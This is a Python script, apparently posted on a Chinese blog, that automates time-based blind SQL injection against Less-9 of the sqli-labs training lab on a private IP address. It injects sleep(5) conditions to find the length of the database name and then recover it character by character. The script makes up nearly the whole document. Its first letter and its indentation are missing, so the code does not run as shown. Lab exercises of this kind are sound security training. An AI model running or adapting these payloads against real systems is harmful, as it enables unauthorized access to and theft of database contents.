mport requests
import string
'''
payload: ?id=2' and sleep(5) --+
'''
url = "http://192.168.31.203/sqli-labs-master1/Less-9/?id=1"
special_char = "' "
char_set = string.printable.strip()
def get_timeout(url):
try:
res = requests.get(url = url, timeout = 3)
return res.text
except:
return "timeout"
def get_content_length(url):
for i in range(1,1000):
payload = f"and if(length((select database()))={i},sleep(5),1) --+"
full_url = url + special_char + payload
print(full_url)
if "timeout" in get_timeout(full_url):
break
return i
content_length = get_content_length(url)
print(f"[+] The length of content: {content_length}")
def get_content(url, content_length):
content = ""
for i in range(1, content_length + 1):
for j in char_set:
payload = f"and if(ascii(substr((select database()),{i},1))={ord(j)},sleep(5),1)-- "
full_url = url + special_char + payload
# print(full_url)
if "timeout" in get_timeout(full_url):
content += j
print(f"[+] The content: {content}")
break
return content
get_content(url, content_length) 
2515
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
